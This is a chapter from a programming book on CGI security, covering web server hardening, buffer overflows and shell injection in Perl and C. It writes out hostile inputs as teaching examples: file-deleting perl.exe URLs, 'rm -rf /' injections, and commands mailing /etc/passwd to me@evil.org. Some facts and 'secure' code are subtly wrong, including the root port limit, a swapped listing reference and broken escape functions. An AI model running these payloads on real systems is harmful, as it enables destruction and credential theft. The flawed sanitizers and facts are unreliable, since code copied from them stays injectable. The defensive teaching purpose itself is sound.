Chapter 9

CGI Security


CONTENTS


Unless you've programmed network software in the past, security has probably been the least of your programming concerns. After all, you don't need to worry about writing insecure programs on a single-user machine because, presumably, only one person has access to the machine anyway.

However, programming software designed for use over the Internet requires a different paradigm of programming with a much greater emphasis on security. There's an old computer maxim that says the only way to truly secure a computer is to disconnect it from the rest of the world and keep it in a locked room. Simply connecting the machine to a network weakens your machine's security.

This especially holds true for a large scale "network of networks" like the Internet, where literally millions of people potentially have access to your computer. Many of the services over the Internet-especially the World Wide Web-were designed so that other people could easily access information from your computer. Each of these services you make available (either consciously or inadvertently) is another possible door for a wily, malicious user to exploit. A badly written network server can be easily intruded, potentially giving someone access to your entire machine and your important data.

What do I mean when I say that every network service you provide is like another door on your system? What exactly constitutes a security breach? For all intents and purposes, a security breach is when a person gains unauthorized access to your machine. "Unauthorized access" can mean many things ranging from running a program on the server not meant to be publicly run to obtaining root access on a UNIX machine.

You are largely dependent on the knowledge and carefulness of the programmers who wrote the network servers for security. After all, one cannot expect you to have to carefully sift through thousands of lines of source code simply to make sure there are no security holes in the software; for the most part, you depend on the reliability of the programmer and other experts who have sifted through source code and carefully tested the software. While past incidents such as the Internet Worm have demonstrated that you cannot completely trust programmers to write perfectly secure code, you can take steps to minimize the risk.

Later, in "Securing Your Web Server," you learn Web server security. For the moment, assume your Web server software is secure and properly configured; that is, no one can gain unauthorized access to your machine through your Web server alone. Why is it important to write secure CGI scripts? CGI is a generic protocol that enables you to extend the Web server. By writing a CGI program, you are adding functionality to the Web server, functionality that might inadvertently introduce new security holes. A carelessly written CGI application can allow anyone full access to your machine.

When users submit a form or access a CGI script in another manner, you are essentially allowing them to run an application remotely on your machine. Because many CGI applications accept some form of user input (either through a fill-out form or from the command line), to some extent you are allowing users to control how the CGI application is run. As a CGI author, you need to make sure that your CGI script can be used only for its specified purpose. This chapter goes over related Web-security issues and provides in-depth information on writing secure CGI programs. At the end of this chapter, you also learn how to write CGI for secure transactions.

Basic Security Issues

Overall security of your Web serving machine depends on many factors. A secure CGI program is useless if your server is misconfigured or if there are other holes on your system. I discuss some of the related Web security issues here and explain how to properly configure your Web server for CGI.

Operating Systems

A common question is which platform is more secure for a Web server: a Macintosh running System 7, a UNIX workstation, a PC running OS/2, and so on. There have been many wars on this topic, each of which reflects people's different biases toward different operating systems.

No operating system is clearly more secure than another. UNIX is arguably more secure than a single-user platform such as a Macintosh or a PC running Windows, because once a user breaks into one of these latter machines, he or she has access to all your files. UNIX, however, has a fundamental understanding of file ownerships and permissions. If your server is configured correctly and is owned by a safe (for example, non-root) user, then if someone unauthorized breaks in, he or she can do only limited damage. Limited damage, however, can be bad enough, as you will see in the examples later in this chapter.

On the other hand, because UNIX often comes preconfigured with many different types of network services such as mail, FTP, Gopher, WWW, and so on, there are more potential "doors" for someone to enter. Securing all of these services is a difficult and time-consuming process, even for the experienced administrator. Even if you configure everything correctly, you are still at the mercy of possible bugs in each individual package. Security flaws in various packages are not uncommon, as is clear from the frequency of notices of insecurities in various common UNIX network services from organizations such as the Computer Emergency Response Team (CERT).

Every different platform has its own different security implications, but one is not more secure than another. Although you should be aware of the implications of each operating system, it should not be your primary criteria when choosing a platform. Choose your platform, seal off the holes associated with that platform, and then configure your Web server securely and correctly. Only after you have completed these steps should you concern yourself with writing secure CGI scripts.

Securing Your Web Server

The first step in writing secure CGI scripts is to make sure your Web server is securely and properly configured. If your Web server is not secure, it does not matter how carefully you write your CGI scripts; people can still break into your machine. Additionally, configuring your Web server correctly helps minimize the potential damage of a badly written CGI program.

Choosing a Secure Web Server
There are a countless number of Web servers available for a variety of platforms, and deciding which product is secure or not is a difficult if not impossible task. As with any product, you will need to rely on company reputation and word-of-mouth.
Examine your options. After you have a list of Web servers, look at how long each product has been available and how many people currently use it. The older and more frequently used the Web server, the more likely security bugs have been found and fixed. If the code is freely available and if you have some time and expertise, look through the source code yourself and see if you can find a potential hole. Read what people on the various Web Usenet newsgroups have to say about each product and its authors or publishers. Reputable companies or authors will inform their users immediately about any problems with their product. Read the various security alerts from organizations such as CERT and CIAC (Computer Incident Advisory Capability).
Examine the feature-set and determine whether you really need all of the features. The more complex and powerful the server, the more likely there is an undetected security hole. Make sure your server supports logging so you can trace the cause of security break-ins or other trouble.
Have a contingency plan. Be prepared to quickly upgrade or replace your Web server if a security hole is discovered. Pay attention to news releases and the newsgroups for information regarding your Web server. Try to use the latest non-beta version of the Web server.
Don't be afraid of the free servers. There is debate over whether providing source code makes a server more or less secure. If the server source is not available, security holes are more difficult to discover. If the source is available, however, then theoretically holes can be discovered, announced, and patched quickly.

You should have three goals when securing your Web server:

The more I know about your computer, the better equipped I am to break into it. For example, if I know in which directory or folder all of your sensitive, private information was stored, I have narrowed my objective from gaining total access to your machine to simply gaining access to a directory, usually a simpler task. Or if I had access to your server configuration files or source code to your CGI scripts, I could easily browse through them looking for potential security holes. If there are holes in your system, you don't want to make it easy for others to know about them, and you want to find them before others do.

Where Should You Put Your CGI?

As discussed earlier in Chapter 2, "The Basics," most Web servers enable you to run CGI programs in many different ways. For example, you could designate a specific directory as your cgi-bin. Alternatively, you could allow CGI to be stored in any directory.

There are advantages and disadvantages to both, but from a security standpoint, it is better to designate one directory to store all of your CGI applications. Having all of your programs in one directory makes it easier to keep track of all of the applications on your server and to audit them for potential security holes. It also helps prevent tampering. If your scripts are located in several different directories, you need to constantly check each one of these for tampering.

If you tend to use a scripting language (such as Perl) for most of your applications, then the source code is contained within the application itself. This code, then, is potentially vulnerable to being read, and exploited, if you're not careful. For example, many text editors save backup files, usually appending some extension to the end of the filename (such as .bak).

For example, emacs saves backup files with the extension filename~. Suppose that you have a CGI script written in Perl-program.cgi-stored in one of the Web data directories rather than in a central designated directory. Now suppose that you made a trivial change to the program using emacs and forgot to remove the backup file. You now have two files in your directory: program.cgi and program.cgi~. The Web server knows that files ending in .cgi are CGI programs and will run the program rather than display its content. However, a smart user might try to access program.cgi~ instead. Because it does not end in .cgi, your Web server sends it as a raw text file, thus allowing the user to search your source code for possible holes. This violates the first maxim of revealing more information than necessary.

However, if your server enables you to specify all files located in a certain directory as a CGI, it doesn't matter what the extension of the file is. So in the same example earlier, if the backup file were located in a properly designated directory and a user tried to access it, the server would try to run the program rather than send the source code.

Note that designating a central directory as the location of all CGI programs on your server is limiting, especially on a multiuser system. For example, if you are an Internet Service Provider and you want to allow your users to write and run their own CGI, you might be inclined to allow CGI to be stored in any directory. Before you do this, consider the alternative options carefully. Are your clients going to be writing a lot of special customized scripts? If not, it is better to have your clients submit the scripts for auditing before being added to the cgi-bin directory rather than enabling CGI in all directories.

Another issue regarding the location of CGI programs is where to put the interpreter. For interpreted scripts, the server runs the interpreter, which in turn loads the script and executes it.

Never put the interpreter in your cgi-bin directory, or in any directory in your data tree for that matter. Giving users access to the interpreter essentially gives them the power to run any application or any series of commands on your system.

This is especially important if you use a Windows or other non-UNIX operating system. In UNIX, you can specify the interpreter in the first line of your script. For example:

#!/usr/local/bin/perl
# this first line says use Perl to run the following script

In Windows, for example, there is no analogous method of specifying the interpreter within the script. One way to call a Perl script would be to create a batch file that calls Perl and the script.

rem progname.bat
rem a wrapper for my perl script, progname.pl
c:\perl\perl.exe progname.pl

However, you might be inclined to avoid creating this extra program by simply putting perl.exe in your cgi-bin directory and accessing the following URL:

http://hostname/cgi-bin/perl.exe?progname.pl

This works, but it also enables anyone in the world to run any Perl command on your machine. For example, someone could access the following URL:

http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B

Decoded, the previous line is equivalent to calling Perl and running the following one-line program, which will delete all the files in the current directory. Clearly, this is undesirable.

unlink <*.*>;

You will never have a reason to put an interpreter in your cgi-bin directory (or any directory capable of running CGI), so never do it. Some Windows servers can determine the type of script by its extension and run the appropriate interpreter. For example, Win-HTTPD assumes every CGI script ending in .pl is a Perl script and will run Perl automatically. If your Web server does not have this feature, use a wrapper script like the first Windows Perl example earlier in this chapter.

Should I Use an Interpreter?
You should never even be tempted to put an interpreter in your cgi-bin if you are using a UNIX or Macintosh Web server. As noted earlier, UNIX enables you to specify the location of the interpreter within the script. To enable scripts on a Macintosh, you associate the script with the appropriate interpreter by editing the resource using a utility such as ResEdit.

Server-Side Includes

In Chapter 4, "Output," you learned a few reasons why you should avoid server-side includes. A common reason often raised is security. Specifically, some implementations of server-side includes (notably NCSA and Netscape) enable users to embed the output of programs in an HTML document. Every time one of these HTML files is accessed, the program is run on the server-side and the output is displayed as part of the HTML document.

By allowing this sort of server-side include, you become susceptible to a few potential security risks. First, on a UNIX machine, the programs are run by the owner of the server, not the owner of the program. If your server isn't properly configured and you have sensitive files or programs owned by the server owner, these files and programs and their output become accessible by users on your machine.

This risk increases if you allow users to edit HTML files on your system from Web browsers. A common example of this is a guestbook. In a guestbook, users fill out a form and submit messages to a CGI program, which will often simply append the unedited message to an HTML file, the guestbook. By not editing or filtering the submitted message, you allow the user to submit HTML code from his or her browser. If you allow programs to be executed in a server-side include, a malicious user can wreak havoc to your machine by submitting a tag like the following:

<!--#exec cmd="/bin/rm -rf /"-->

This server-side include will attempt to delete everything it can on your machine.

Note that you could have prevented this problem in several ways without having to completely turn off server-side includes. You could have filtered out all HTML tags before appending the submitted text to your guestbook. Or you could have disabled the exec capability of your server-side include (I show you how to do this for the NCSA server later in this chapter in "Example: Securely Configuring the NCSA Server").

If you forgot to do either of these things, other precautions you should have taken would have greatly minimized the damage on your machine by such a tag anyway. For example, as long as your server was running as a nonexistent, non-root user, this tag would most likely not have deleted anything of any importance, perhaps nothing at all. Suppose that instead of attempting to delete everything on your disks, the malicious user attempted to obtain your /etc/passwd for hopeful cracking purposes using something like the following:

<!--#exec cmd="/bin/mail me@evil.org < /etc/passwd"-->

However, if your system was using the shadow password suite, then your /etc/passwd has no useful information to potential hackers.

This example demonstrates two important things about both server-side includes and CGI in general. First, security holes can be completely hidden. Who would have thought that a simple guestbook program on a system with server-side includes posed a large security risk? Second, the potential damage of an inadvertent security hole can be greatly minimized by carefully configuring your server and securing your machine as a whole.

Although server-side includes add another potentially useful dimension to your Web server, think carefully about the potential risks, as well. In Chapter 4, I offer several alternatives to using server-side includes. Unless you absolutely need to use server-side includes, you might as well disable them and close off a potential security hole.

Securing Your UNIX Web Server

A secured UNIX system is a powerful platform for serving Web documents. However, there are many complex issues associated with securing and properly configuring a UNIX Web server. The very first thing you should do is make sure your machine is as secure as possible.

Disable network services you don't need, no matter how harmless you think they are. It is highly unlikely that anyone can break into your machine using the finger protocol, for example, which only answers queries about users. However, finger can give hackers useful information about your system.

Secure your system internally. If a hacker manages to break into one user's account, make sure the hacker cannot gain any additional privileges. Useful actions include installing a shadow password suite and removing all setuid scripts (scripts that are set to run as the owner of the script, even if called by another user).

Securing a UNIX machine is a complex topic and goes beyond the scope of this book. I highly recommend that you purchase a book on the topic, read the resources available on the Internet, even hire a consultant if necessary. Don't underestimate the importance of securing your machine.

Next, allot separate space for your Web server and document files. The intent of your document directories is to serve these files to other people, possibly to the rest of the world, so don't put anything in these directories that you wouldn't want anyone else to see. Your server directories contain important log and configuration information. You definitely do not want outside users to see this information, and you most likely don't want most of your internal users to see it or write to it either.

Set the ownership and permissions of your directories and server wisely. It's common practice to create a new user and group specifically to own Web-related directories. Make sure nonprivileged users cannot write to the server or document directories.

Your server should never be "running as root." This is a misleading statement. In UNIX, only root can access ports less than 1234. Because by default Web servers run on port 80, you need to be root to start a Web server. However, after the Web server is started as root, it can either change its own process's ownership (if it's internally threaded) or change the ownership of its child processes that handle connections (if it's a forking server). Either method allows the server to process requests as a non-root user. Make sure you configure your Web server to "run as non-root," preferably as a completely nonexistent user such as "nobody." This limits the potential damage if you have a security hole in either your server or your CGI program.

Disable all features unless you absolutely need them. If you initially disable a feature and then later decide you want to use it, you can always turn it back on. Features you might want to disable include server-side includes and serving symbolic links.

If your users don't need to serve their personal Web documents from your server, disable public Web directories. This enables you to have complete and central control over all documents served from your machine, an important quality for general maintenance and security.

If your users do need to serve their personal documents (for example, if you are an Internet Access Provider), make sure they cannot override your main configuration. Seriously consider whether users need the ability to run CGI programs from their own personal directories. As stated earlier, it's preferable to store all CGI in one centralized location.

CGIWRAP
A popular package available on the Web is cgiwrap, written by Nathan Neulinger nneul@umr.edu. This package enables users to run their own CGI programs by running the program as the owner of the program rather than the owner of the server.
It's not clear whether this is more or less beneficial than simply allowing anyone to run his or her own CGI programs unwrapped. On one hand, a bad CGI script has the capability to do less damage owned by nobody rather than by a user who actually exists. On the other hand, if the CGI program does damage the system as nobody, the responsibility lies on the system administrator, whereas if only a specific user's files were damaged, it would ultimately be the user's responsibility.
My advice would be to not go with either option and simply disallow unaudited user CGI programs. If this is unacceptable, then ultimately whether you use cgiwrap or a similar program depends on where you want the responsibility to lie.

Finally, you might want to consider setting up a chroot environment for your Web documents. In UNIX, you can protect a directory tree by using chroot. A server running inside of a chrooted directory cannot see anything outside of that directory tree. Under a chrooted environment, if someone manages to break in through your Web server, they can damage files only within that directory tree.

Note, however, that a chrooted environment is appropriate only for a Web server serving a single source of documents. If your Web server is serving users' documents in multiple directories, it is nearly impossible to set up an effective chrooted environment. Additionally, a chrooted environment is weakened by the existence of interpreters (such as Perl or a shell). In a chrooted environment without any shells or interpreters, someone who has broken in can at worst change or damage your files; with an interpreter, potential damage increases.

Example: Securely Configuring the NCSA Server

I'll demonstrate how one might go about properly configuring a common Web server on a UNIX environment by discussing the NCSA Server (v1.4.2). There are many Web servers available for UNIX, but NCSA is one of the oldest, is commonly used, is freely available, and is fairly easy to configure. I will demonstrate only the configuration I think is most relevant to securing the Web server; for more detailed instructions on configuring NCSA httpd, look at its Web site: URL:http://hoohoo.ncsa.uiuc.edu/. You can apply the principles demonstrated here to almost any UNIX Web server.

First, I need to present the criteria. In this scenario, I want to set up the NCSA server on a secured UNIX machine for a small Internet service provider called MyCompany. The machine's host name is www.mycompany.net. I want everyone with an account on my machine to be able to serve his or her own Web documents and possibly use CGI or other features.

What features do I absolutely need? In this case, because I'm a small Internet service provider, I will not let users serve their own CGI. If they want to write and use their own CGI programs, they must submit it to me for auditing; if it's okay, I'll install it. Additionally, I'll provide general programs that are commonly requested, such as guestbooks and generic form-processing applications. I don't need any other features for now in this scenario, including server-side includes.

Here is how I'm going to configure my Web server. I will create the user and group www; these will own all of the appropriate directories. I will create one directory for my server files (/usr/local/etc/httpd/) and one directory for the Web documents (/usr/local/etc/httpd/htdocs/). Both directory trees will be world readable and user and group writeable.

Now, I'm ready to configure the server. NCSA httpd has three configuration files: access.conf, httpd.conf, and srm.conf. First, you need to tell httpd where your server and HTML directories are located. In httpd.conf, specify the server directory with the following line:

ServerRoot /usr/local/etc/httpd

In srm.conf, specify the document directory with

DocumentRoot /usr/local/etc/httpd/htdocs

Because I want to designate all files in /usr/local/etc/httpd/cgi-bin as CGI programs, I include the following line in srm.conf:

ScriptAlias /cgi-bin/ /usr/local/etc/httpd/cgi-bin

Note that the actual location of my cgi-bin directory is not in my document tree but in my server tree. Because I want to keep my server directory (including the directory containing the CGI) as private as possible, I keep it outside of the document directory. If I have a CGI in this directory called mail.cgi, I can access it by using the URL

http://www.mycompany.net/cgi-bin/mail.cgi

One other line in srm.conf needs to be edited; it's not particularly relevant to our specific quest of securing the server, but for completeness sake, I'll mention it anyway:

Alias /icons/ /usr/local/etc/httpd/icons

The Alias directive enables you to specify an alias for a directory either in or out of your document directory tree. Unlike the ScriptAlias directive, Alias does not change the meaning of the directory in any other way.

Because I want to disable server-side includes and not allow CGI in any directory other than cgi-bin, I comment out the lines in srm.conf by inserting a pound sign (#) in front of the line.

#AddType text/x-server-parsed-html .shtml
#AddType application/x-httpd-cgi .cgi

AddType enables you to associate MIME types with filename extensions. text/x-server-parsed-html is the MIME type for parsed HTML (for example, HTML with embedded tags for server-side includes) whereas application/x-httpd-cgi is the type for CGI applications. I don't need to specify the extension for this MIME type in this case because I've configured the server to assume that everything in the cgi-bin, regardless of filename extension, is a CGI.

Finally, I need to set properties and access restrictions to certain directories by editing the global access.conf file. To define global parameters for all the directories, simply put the directives in the file without any surrounding tags. In order to specify parameters for specific directories, surround the directives with <Directory directoryname> tags, where directoryname is the full path of the directory.

By default, the following global options are set:

Options Indexes FollowSymLinks

Indexes enables you to specify a file to look for if a directory is specified in the URL without a filename. By default, this variable, specified by DirectoryIndex in srm.conf, is set to index.html, which is fine for my purposes. FollowSymLinks means that the server will return the data to which the symbolic link is pointing. I see no need for this feature, so I'll disable it. Now, this line looks like the following:

Options Indexes

If I want to allow CGI programs in any directory, I could set that by including the option ExecCGI.

Options Indexes ExecCGI

This line, along with the AddType directive in srm.conf, would allow me to run a CGI in any directory by adding the extension .cgi to all CGI programs.

By default, NCSA httpd is configured so that all of the settings in access.conf can be overridden by creating an .htaccess file in the specific directory with the appropriate properties and access restrictions. In this case, I don't mind if users change their own access restrictions. However, I don't want users to give themselves the ability to run CGI in their directories by including the .htaccess file.

AddType application/x-httpd-cgi .cgi
Options Indexes ExecCGI

Therefore, I edit access.conf to allow the user to override all settings except for Options.

AllowOverride FileInfo AuthConfig Limit

My server is now securely configured. I have disallowed CGI in all but the cgi-bin directory, and I've completely disallowed server-side includes. The server runs as user nobody, a non-
existent user on my system. I've disabled all features I don't need, and users cannot override these important restrictions. For more information on the many other configurations, including detailed access restrictions, refer to the NCSA server documentation.

Writing Secure CGI Programs

At this point, you have presumably secured your machine and your Web server. You are finally ready to learn how to write a secure CGI program. The basic principles for writing secure CGI are similar to the ones outlined earlier:

I've already demonstrated the potential danger of the first principle with the guestbook example. I present a few other common mistakes that can open up holes, but you need to remember to consider all of the implications of every function you write or use.

The second principle is simply an extension of a general security principle: the less the outside world knows about the inside of your system, the less-equipped outsiders are to break in.

This last principle is not just a good programming rule of thumb but a good security one, as well. CGI programs should be robust. One of the first things a hacker will try to do to break into a machine through a CGI program is to try to confuse it by experimenting with the input. If your program is not robust, it will either crash or do something it was not designed to do. Both possibilities are undesirable. To combat this possibility, don't make any assumptions about the format of the information or the values the client will send.

The most barebone CGI program is a simple input/output program. It takes what the client tells it and returns some response. Such a program offers very little risk (although possible holes still exist, as you will later see). Because the CGI program is not doing anything interesting with the input, nothing wrong is likely to happen. However, once your program starts manipulating the input, possibly calling other programs, writing files, or doing anything more powerful than simply returning some output, you risk introducing a security hole. As usual, power is directly proportional to security risk.

Language Risks

Different languages have different inherent security risks. Secure CGI programs can be written in any language, but you need to be aware of each language's quirks. I discuss only C and Perl here, but some of the traits can be generalized to other languages. For more specific information on other languages, refer to the appropriate documentation.

Earlier in this chapter you learned that in general, compiled CGI programs are preferable to interpreted scripts. Compiled programs have two advantages: first, you don't need to have an interpreter accessible to the server, and second, source code is not available. Note that some traditionally interpreted languages such as Perl can be compiled into a binary. (For information on how to do this in Perl, consult Larry Wall and Randall Schwartz's Programming Perl published by O'Reilly and Associates). From a security standpoint, a compiled Perl program is just as good as a compiled C program.

Lower-level languages such as C suffer from a problem called a buffer overflow. C doesn't have a good built-in method of dealing with strings. The traditional method is to declare either an array of characters or a pointer to a character. Many have a tendency to use the former method because it is easier to program. Consider the two equivalent excerpts of code in Listings 9.1 and 9.2.


Listing 9.1. Defining a string using an array in C.
#include <stdio.h>
#include <string.h>


#define message "Hello, world!"


int main()
{
  char buffer[80];


  strcpy(buffer,message);
  printf("%s\n",buffer);
  return 0;
}


Listing 9.2. Defining a string using a pointer in C.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


#define message "Hello, world!"


int main()
{
  char *buffer = malloc(sizeof(char) * (strlen(message) + 1));


  strcpy(buffer,message);
  printf("%s\n",buffer);
  return 0;
}

Listing 9.1 is much simpler than Listing 9.2, and in this specific example, both work fine. This is a contrived example; I already know the length of the string I am dealing with, and consequently, I can define the appropriate length array. However, in a CGI program, you have no idea how long the input string is. If message, for example, were longer than 80 characters, the code in Listing 9.2 would crash.

This is called a buffer overflow, and smart hackers can exploit these to remotely execute commands. The buffer overflow was the bug that afflicted NCSA httpd v1.3. It's a good example of how and why a network (or CGI) programmer needs to program with more care. On a single-user machine, a buffer overflow simply leads to a crash. There is no advantage to executing programs using a buffer overflow on a crashed single-user machine because presumably (with the exception of public terminals), you could have run any program you wanted anyway. However, on a networked system, a crashed CGI program is more than a nuisance; it's a potential door for unauthorized users to enter.

The code in Listing 9.2 solves two problems. First, it dynamically allocates enough memory to store the string. Second, notice that I added 1 to the length of the message. I actually allocate enough memory for one more character than the length of the string. This is to guarantee the string is null-terminated. The strcpy() function pads the remainder of the target string with null characters, and because the target string always has room for one extra character, strcpy() places a null character there. There's no reason to assume that the input string sent to the CGI script ends in a null character, so I place one at the end just in case.

Provided your C programs avoid problems such as buffer overflows, you can write secure CGI programs. However, this is a tough provision, especially for large, more complicated CGI programs. Problems like this force you to spend more time thinking about low-level programming tasks rather than the general CGI task. For this reason, you might prefer to program in a higher-level programming language (such as Perl) that robustly handles such low-level tasks.

However, there is a flip side to the high-level nature of Perl. Although you can assume that Perl will properly handle string allocation for you, there is always the danger that Perl is doing something in a high-level syntax of which you are not aware. This will become clearer in the next section on shell dangers.

Shell Dangers

Many CGI tasks are most easily implemented by running other programs. For example, if you were to write a CGI mail gateway, it would be silly to completely reimplement a mail transport agent within the CGI program. It's much more practical to pipe the data into an existing mail transport agent such as sendmail and let sendmail take care of the rest of the work. This practice is fine and is encouraged.

The security risk depends on how you call these external programs. There are several functions that do this in both C and Perl. Many of these functions work by spawning a shell and by having the shell execute the command. These functions are listed in Table 9.1. If you use one of these functions, you are vulnerable to weaknesses in UNIX shells.

Table 9.1. Functions in both C and Perl that spawn a shell.

Perl FunctionsC Functions
system(' . . . ') system()
open('| . . . ') popen()
exec(' . . . ')  
eval(' . . . ')  
' . . . '  

Why are shells dangerous? There are several nonalphanumeric characters that are reserved as special characters by the shell. These characters are called metacharacters and are listed in Table 9.2.

Table 9.2. Shell metacharacters.

;
<
>
*
|
'
&
$
!
#
(
)
[
]
{
}
'
"
 

Each of these metacharacters performs special functions within the shell. For example, suppose that you wanted to finger a machine and save the results to a file. From the command line, you might type:

finger @fake.machine.org > results

This would finger the host fake.machine.org and save the results to the text file results. The > character in this case is a redirection character. If you wanted to actually use the > character-for example, if you want to echo it to the screen-you would need to precede the character with a backslash. For example, the following would print a greater-than symbol > to the screen:

echo \>

This is called escaping or sanitizing the character string.

How can a hacker use this information to his or her advantage? Observe the finger gateway written in Perl in Listing 9.3. All this program is doing is allowing the user to specify a user and a host, and the CGI will finger the user at the host and display the results.


Listing 9.3. finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - an unsafe finger gateway


require 'cgi-lib.pl';


print &PrintHeader;
if (&ReadParse(*in)) {
  print "<pre>\n";
  print '/usr/bin/finger $in{'username'}';
  print "</pre>\n";
}
else {
  print "<html> <head>\n";
  print "<title>Finger Gateway</title>\n";
  print "</head>\n<body>\n";
  print "<h1>Finger Gateway</h1>\n";
  print "<form method=POST>\n";
  print "<p>User@Host: <input type=text name=\"username\">\n";
  print "<p><input type=submit>\n";
  print "</form>\n";
  print "</body> </html>\n";
}

At first glance, this might seem like a harmless finger gateway. There's no danger of a buffer overflow because it is written in Perl. I use the complete pathname of the finger binary so the gateway can't be tricked into using a fake finger program. If the input is in an improper format, the gateway will return an error but not one that can be manipulated.

However, what if I try entering the following field (as shown in Figure 9.1):

Figure 9.1 : Text to manipulate unsafe finger gateway.

nobody@nowhere.org ; /bin/rm -rf /

Work out how the following line will deal with this input:

print `/usr/bin/finger $in{'username'}`;

Because you are using back ticks, first it will spawn a shell. Then it will execute the following command:

/usr/bin/finger nobody@nowhere.org ; /bin/rm -rf /

What will this do? Imagine typing this in at the command line. It will wipe out all of the files and directories it can, starting from the root directory. We need to sanitize this input to render the semicolon (;) metacharacter harmless. In Perl, this is easily achieved with the function listed in Listing 9.4. (The equivalent function for C is in Listing 9.5; this function is from the cgihtml C library.)


Listing 9.4. escape_input() in Perl.
sub escape_input {
  @_ =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
  return @_;
}


Listing 9.5. escape_input() in C.
char *escape_input(char *str)
/* takes string and escapes all metacharacters. should be used before
   including string in system() or similar call. */
{
  int i,j = 0;
  char *new = malloc(sizeof(char) * (strlen(str) * 2 + 1));


  for (i = 0; i < strlen(str); i++) {
    printf("i = %d; j = %d\n",i,j);
    switch (str[i]) {
      case '|': case '&': case ';': case '(': case ')': case '<':
      case '>': case '\'': case '"': case '*': case '?': case '\\':
      case '[': case ']': case '$': case '!': case '#': case ';':
      case '`': case '{': case '}':
        new[j] = '\\';
        j++;
        break;
      default:
        break;
    }
    new[j] = str[i];
    j++;
  }
  new[j] = '\n';
  return new;
}

This returns a string with the shell metacharacters preceded by a backslash. The revised finger.cgi gateway is in Listing 9.6.


Listing 9.6. A safe finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - an safe finger gateway

require 'cgi-lib.pl';

sub escape_input {
  @_ =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
  return @_;
}

print &PrintHeader;
if (&ReadParse(*in)) {
  print "<pre>\n";
  print `/usr/bin/finger &escape_input($in{'username'})`;
  print "</pre>\n";
}
else {
  print "<html> <head>\n";
  print "<title>Finger Gateway</title>\n";
  print "</head>\n<body>\n";
  print "<h1>Finger Gateway</h1>\n";
  print "<form method=POST>\n";
  print "<p>User@Host: <input type=text name=\"username\">\n";
  print "<p><input type=submit>\n";
  print "</form>\n";
  print "</body> </html>\n";
}

This time, if you try the same input as the preceding, a shell is spawned and it tries to execute:

/usr/bin/finger nobody@nowhere.org \; /bin/rm -rf /

The malicious attempt has been rendered useless. Rather than attempt to delete all the directories on the file system, it will try to finger the users nobody@nowhere.org, ;, /bin/rm, -rf, and /. It will probably return an error because it is unlikely that the latter four users exist on your system.

Note a couple of things. First, if your Web server was configured correctly (for example, running as non-root), the attempt to delete everything on the file system would have failed. (If the server was running as root, then the potential damage is limitless. Never do this!) Additionally, the user would have to assume that the rm command was in the /bin directory. He or she could also have assumed that rm was in the path. However, both of these are pretty reasonable guesses for the majority of UNIX machines, but they are not global truths. On a chrooted environment that did not have the rm binary located anywhere in the directory tree, the hacker's efforts would have been a useless endeavor. By properly securing and configuring the Web server, you can theoretically minimize the potential damage to almost zero, even with a badly written script.

However, this is no cause to lessen your caution when writing your CGI programs. In reality, most Web environments are not chrooted, simply because it prevents the flexibility many people need in a Web server. Even if one could not remove all the files in a file system because the server was not running as root, someone could just as easily try input such as the following, which would have e-mailed the /etc/passwd file to me@evil.org for possible cracking:

nobody@nowhere.org ; /bin/mail me@evil.org < /etc/passwd

A hacker could do any number of other things by manipulating this one hole, even in a well-configured environment. If you let a hole slip past you in a simple CGI program, how can you be sure you properly and securely configured your complicated UNIX system and Web server?

The answer is, you can't. Your best bet is to make sure your CGI programs are secure. Not sanitizing input before running it in a shell is a simple thing to cure, and yet it is one of the most common mistakes in CGI programming.

Fortunately, Perl has a good mechanism for catching potentially tainted variables. If you use taintperl instead of Perl (or perl -T if you are using Perl 5), the script will exit at points where potentially tainted variables are passed to a shell command. This will help you catch all instances of potentially tainted variables before you actually begin to use your CGI program.

Notice that there are several more functions in Perl that spawn the shell than there are in C. It is not immediately obvious, even to the intermediate Perl programmer, that back ticks spawn a shell before executing the program. This is the alternative danger of higher-level language; you don't know what security holes a function might cause because you don't necessarily know exactly what it does.

You don't need to sanitize the input if you avoid using functions that spawn shells. In Perl, you can do this with either the system() or exec() function by enclosing each argument in separate quotes. For example, the following is safe without sanitizing $input:

system("/usr/ucb/finger",$input{'username'});

However, in the case of your finger gateway, this feature is useless because you need to process the output of the finger command, and there is no way to trap it if you use the system() function.

In C, you can also execute programs directly by using the exec class of functions: execv(), execl(), execvp(), execlp(), and execle(). execl() would be the C equivalent of the Perl function system() with multiple arguments. Which exec function you use and how you implement it depends on your need; specifics go beyond the scope of this book.

Secure Transactions

One aspect of security only briefly discussed earlier is privacy. A popular CGI application these days tends to be one that collects credit card information. Data collection is a simple task for a CGI application, but the collection of sensitive data requires a secure means of getting the information from the browser to the server and CGI program.

For example, suppose that I want to sell books over the Internet. I might set up a Web server with a form that allows customers to buy books by submitting personal information and a credit card number. After I have that information, I want to store it on my machine for company records.

If anyone were to break into my company's machine, that person would have access to these confidential records containing customer information and credit card numbers. In order to prevent this, I would make sure the machine is configured securely and that my CGI script that accepts form input is written correctly so that it cannot be maliciously manipulated. In other words, as the administrator of the machine and the CGI programmer, I have a lot of control over the first problem: preventing information from being stolen directly from my machine.

However, how can I prevent someone from intercepting the information as it goes from the client to the server? Remember how information moves from the Web browser to the CGI program (as explained in Chapter 1, "Common Gateway Interface (CGI)")? Information flows over the network from the browser to the server first, and then the server passes the information to the CGI program. This information can be intercepted while it is moved from the client machine to the server (as shown in Figure 9.2). Note that in order to protect the information from being intercepted over the network, the information must be encrypted between the client and the server. You cannot implement a CGI-specific encryption scheme unless the client understands it, as well.

Figure 9.2 : A diagram of the information flow between the client, server, and CGI application.

Java, CGI, and Secure Transactions
Due to the nature of Web transactions, the only way you could develop and use your own secure transaction protocol using only CGI would be by first encrypting the form information before it is submitted by the browser to the server. The scheme would look like the diagram in Figure 9.3.
Until recently, developing your own secure transaction protocol was an impossible task. Thanks to recent innovations in client-side processing such as Java, such development is now possible.
The idea is to create a Java interface that is a superset of normal HTML forms. When the Java Submit button is selected, the Java applet first encrypts the appropriate values before sending it to the Web server by using the normal POST HTTP request (see Figure 9.4).
Using Java as a client to send and receive encrypted data enables you to create your own customized encryption schemes without requiring a potentially expensive commercial server. For more information on how one might implement such a transaction, refer to Chapter 8, "Client/Server Issues."

Figure 9.3 : A secure transaction scheme using only CGI.

Figure 9.4 : An applet sends the form data instead of the browser.

